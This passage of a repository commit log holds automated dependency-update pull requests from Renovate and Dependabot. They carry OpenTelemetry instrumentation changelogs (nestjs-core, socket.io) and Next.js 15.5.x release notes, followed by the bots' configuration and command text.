[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7)

##### ⚠ BREAKING CHANGES

- chore!: Update to 2.x and 0.200.x @&#8203;opentelemetry/\* packages
from opentelemetry-js.git per [2.x upgrade
guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md)
- The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0.
This means that support for Node.js 14 and 16 has been dropped.
  - The minimum supported TypeScript version has been raised to 5.0.4.
- The compilation target for transpiled TypeScript has been raised to
ES2022 (from ES2017).

##### Bug Fixes

- **deps:** update otel core experimental to ^0.57.2
([#&#8203;2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716))
([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da))

##### Miscellaneous Chores

- update to JS SDK 2.x
([#&#8203;2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738))
([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.36.2 to ^0.37.0
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.45.1 to ^0.46.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0540-2025-10-21)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187))
([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc))

##### Bug Fixes

- **deps:** update all patch versions
([#&#8203;3134](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3134))
([c302e35](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c302e3530d6ee9a856ffb43730082e1cee87b0ee))

###
[`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0530-2025-10-06)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145))
([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f))

###
[`v0.52.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0522-2025-09-29)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46)

##### Bug Fixes

- force new release-please PR
([#&#8203;3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123))
([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0))

###
[`v0.52.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0521-2025-09-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28)

##### Bug Fixes

- force new release-please PR
([#&#8203;3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098))
([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73))

###
[`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0510-2025-09-10)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034))
([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820))

###
[`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0500-2025-09-08)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec)

##### Features

- **deps:** update otel deps
([#&#8203;3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027))
([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a))

###
[`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0490-2025-07-09)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/52dd28deae0ebfbec43bdaed82f4749fc9803797...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930))
([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea))

###
[`v0.48.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0481-2025-07-04)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...52dd28deae0ebfbec43bdaed82f4749fc9803797)

##### Bug Fixes

- **deps:** update all patch versions
([#&#8203;2832](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2832))
([e45605d](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e45605d0e70158b0ea868bc3c8acb65095d6d4d1))

###
[`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0480-2025-06-02)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871))
([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc))

###
[`v0.47.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0470-2025-05-15)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/88386368afca78a4b3ed898eb5c28e4f5bde2271...393b51596dc869983a03ce8857658029ca122a15)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828))
([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346))

###
[`v0.46.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0460-2025-04-08)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...88386368afca78a4b3ed898eb5c28e4f5bde2271)

##### Features

- **instrumentation-nestjs-core:** add support for NestJS 11
([#&#8203;2685](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2685))
([67e37b7](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/67e37b78ab46273e937fb959b6c8cdcf9e16c8fb))

###
[`v0.45.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0450-2025-03-18)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7)

##### ⚠ BREAKING CHANGES

- chore!: Update to 2.x and 0.200.x @&#8203;opentelemetry/\* packages
from opentelemetry-js.git per [2.x upgrade
guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md)
- The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0.
This means that support for Node.js 14 and 16 has been dropped.
  - The minimum supported TypeScript version has been raised to 5.0.4.
- The compilation target for transpiled TypeScript has been raised to
ES2022 (from ES2017).

##### Bug Fixes

- **deps:** update otel core experimental to ^0.57.2
([#&#8203;2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716))
([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da))

##### Miscellaneous Chores

- update to JS SDK 2.x
([#&#8203;2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738))
([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0540-2025-10-21)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187))
([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.53.0 to ^0.54.0

###
[`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0530-2025-10-06)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145))
([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.2 to ^0.53.0

###
[`v0.52.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0523-2025-09-29)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46)

##### Bug Fixes

- force new release-please PR
([#&#8203;3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123))
([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.1 to ^0.52.2

###
[`v0.52.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0522-2025-09-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28)

##### Bug Fixes

- force new release-please PR
([#&#8203;3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098))
([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.0 to ^0.52.1

###
[`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0520-2025-09-10)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034))
([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.50.0 to ^0.51.0

###
[`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0510-2025-09-08)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec)

##### Features

- **deps:** update otel deps
([#&#8203;3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027))
([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.49.0 to ^0.50.0

###
[`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0500-2025-07-09)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930))
([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.48.0 to ^0.49.0

###
[`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0490-2025-06-02)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871))
([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.47.0 to ^0.48.0

###
[`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0480-2025-05-15)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828))
([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.46.0 to ^0.47.0

###
[`v0.47.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0470-2025-03-18)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7)

##### ⚠ BREAKING CHANGES

- chore!: Update to 2.x and 0.200.x @&#8203;opentelemetry/\* packages
from opentelemetry-js.git per [2.x upgrade
guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md)
- The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0.
This means that support for Node.js 14 and 16 has been dropped.
  - The minimum supported TypeScript version has been raised to 5.0.4.
- The compilation target for transpiled TypeScript has been raised to
ES2022 (from ES2017).

##### Bug Fixes

- **deps:** update otel core experimental to ^0.57.2
([#&#8203;2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716))
([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da))

##### Miscellaneous Chores

- update to JS SDK 2.x
([#&#8203;2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738))
([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.45.1 to ^0.46.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MC4zMy42IiwidXBkYXRlZEluVmVyIjoiNDEuMTU2LjEiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2025-10-22 03:59:48 +00:00
dependabot[bot] 35c2ad262f chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/vercel/next.js/releases">next's
releases</a>.</em></p>
<blockquote>
<h2>v15.5.4</h2>
<blockquote>
<p>[!NOTE]<br />
This release is backporting bug fixes. It does <strong>not</strong>
include all pending features/changes on canary.</p>
</blockquote>
<h3>Core Changes</h3>
<ul>
<li>fix: ensure onRequestError is invoked when otel enabled (<a
href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li>
<li>fix: devtools initial position should be from next config (<a
href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li>
<li>[devtool] fix overlay styles are missing (<a
href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li>
<li>Turbopack: don't match dynamic pattern for node_modules packages (<a
href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li>
<li>Turbopack: don't treat metadata routes as RSC (<a
href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li>
<li>[turbopack] Improve handling of symlink resolution errors in
track_glob and read_glob (<a
href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li>
<li>Turbopack: throw large static metadata error earlier (<a
href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li>
<li>fix: error overlay not closing when backdrop clicked (<a
href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li>
<li>Turbopack: flush Node.js worker IPC on error (<a
href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li>
</ul>
<h3>Misc Changes</h3>
<ul>
<li>[CNA] use linter preference (<a
href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li>
<li>CI: use KV for test timing data (<a
href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li>
<li>docs: september improvements and fixes (<a
href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li>
</ul>
<h3>Credits</h3>
<p>Huge thanks to <a
href="https://github.com/yiminghe"><code>@​yiminghe</code></a>, <a
href="https://github.com/huozhi"><code>@​huozhi</code></a>, <a
href="https://github.com/devjiwonchoi"><code>@​devjiwonchoi</code></a>,
<a href="https://github.com/mischnic"><code>@​mischnic</code></a>, <a
href="https://github.com/lukesandberg"><code>@​lukesandberg</code></a>,
<a href="https://github.com/ztanner"><code>@​ztanner</code></a>, <a
href="https://github.com/icyJoseph"><code>@​icyJoseph</code></a>, <a
href="https://github.com/leerob"><code>@​leerob</code></a>, <a
href="https://github.com/fufuShih"><code>@​fufuShih</code></a>, <a
href="https://github.com/dwrth"><code>@​dwrth</code></a>, <a
href="https://github.com/aymericzip"><code>@​aymericzip</code></a>, <a
href="https://github.com/obendev"><code>@​obendev</code></a>, <a
href="https://github.com/molebox"><code>@​molebox</code></a>, <a
href="https://github.com/OoMNoO"><code>@​OoMNoO</code></a>, <a
href="https://github.com/pontasan"><code>@​pontasan</code></a>, <a
href="https://github.com/styfle"><code>@​styfle</code></a>, <a
href="https://github.com/HondaYt"><code>@​HondaYt</code></a>, <a
href="https://github.com/ryuapp"><code>@​ryuapp</code></a>, <a
href="https://github.com/lpalmes"><code>@​lpalmes</code></a>, and <a
href="https://github.com/ijjk"><code>@​ijjk</code></a> for helping!</p>
<h2>v15.5.3</h2>
<blockquote>
<p>[!NOTE]<br />
This release is backporting bug fixes. It does <strong>not</strong>
include all pending features/changes on canary.</p>
</blockquote>
<h3>Core Changes</h3>
<ul>
<li>fix: validation return types of pages API routes (<a
href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li>
<li>fix: relative paths in dev in validator.ts (<a
href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li>
<li>fix: remove satisfies keyword from type validation to preserve old
TS compatibility (<a
href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li>
</ul>
<h3>Credits</h3>
<p>Huge thanks to <a
href="https://github.com/bgub"><code>@​bgub</code></a> for helping!</p>
<h2>v15.5.2</h2>
<blockquote>
<p>[!NOTE]<br />
This release is backporting bug fixes. It does <strong>not</strong>
include all pending features/changes on canary.</p>
</blockquote>
<h3>Core Changes</h3>
<ul>
<li>fix: disable unknownatrules lint rule entirely (<a
href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li>
<li>revert: add ?dpl to fonts in /_next/static/media (<a
href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li>
</ul>
<h3>Credits</h3>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="https://github.com/vercel/next.js/commit/40f1d7814d8f1ab3d9e169b389015b8d6f258fb3"><code>40f1d78</code></a>
v15.5.4</li>
<li><a
href="https://github.com/vercel/next.js/commit/cb30f0a1760b640b42cc15f34c55531499d3949c"><code>cb30f0a</code></a>
[backport] docs: september improvements and fixes (<a
href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/b6a32bb57956f0bd4175d7b04e83c3bbad5249a8"><code>b6a32bb</code></a>
[backport] [CNA] use linter preference (<a
href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)
(<a
href="https://redirect.github.com/vercel/next.js/issues/84087">#84087</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/26d61f1e9a27a5f6c3dea5ac36c2c20c33cc0127"><code>26d61f1</code></a>
[backport] Turbopack: flush Node.js worker IPC on error (<a
href="https://redirect.github.com/vercel/next.js/issues/84079">#84079</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/e11e87a54734bb8136e2e5ac5c0c2218b1e57a48"><code>e11e87a</code></a>
[backport] fix: error overlay not closing when backdrop clicked (<a
href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)
(<a
href="https://redirect.github.com/vercel/next.js/issues/83">#83</a>...</li>
<li><a
href="https://github.com/vercel/next.js/commit/0a29888575d9f95e1cdf26d62bcab05a5a53bf95"><code>0a29888</code></a>
[backport] fix: devtools initial position should be from next config (<a
href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)...</li>
<li><a
href="https://github.com/vercel/next.js/commit/7a53950c136242fa77af5c02307a86966379e5a8"><code>7a53950</code></a>
[backport] Turbopack: don't treat metadata routes as RSC (<a
href="https://redirect.github.com/vercel/next.js/issues/83804">#83804</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/050bdf1ae70f71cac9a4634b1059ce386b15825a"><code>050bdf1</code></a>
[backport] Turbopack: throw large static metadata error earlier (<a
href="https://redirect.github.com/vercel/next.js/issues/83816">#83816</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/1f6ea09f8586ec26978c79d0a3d90b4b6b62f1a4"><code>1f6ea09</code></a>
[backport] Turbopack: Improve handling of symlink resolution errors (<a
href="https://redirect.github.com/vercel/next.js/issues/83805">#83805</a>)</li>
<li><a
href="https://github.com/vercel/next.js/commit/c7d1855499e507df5591c3697a365ae1a063ebb0"><code>c7d1855</code></a>
[backport] CI: use KV for test timing data (<a
href="https://redirect.github.com/vercel/next.js/issues/83860">#83860</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/vercel/next.js/compare/v15.3.2...v15.5.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=next&package-manager=npm_and_yarn&previous-version=15.3.2&new-version=15.5.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
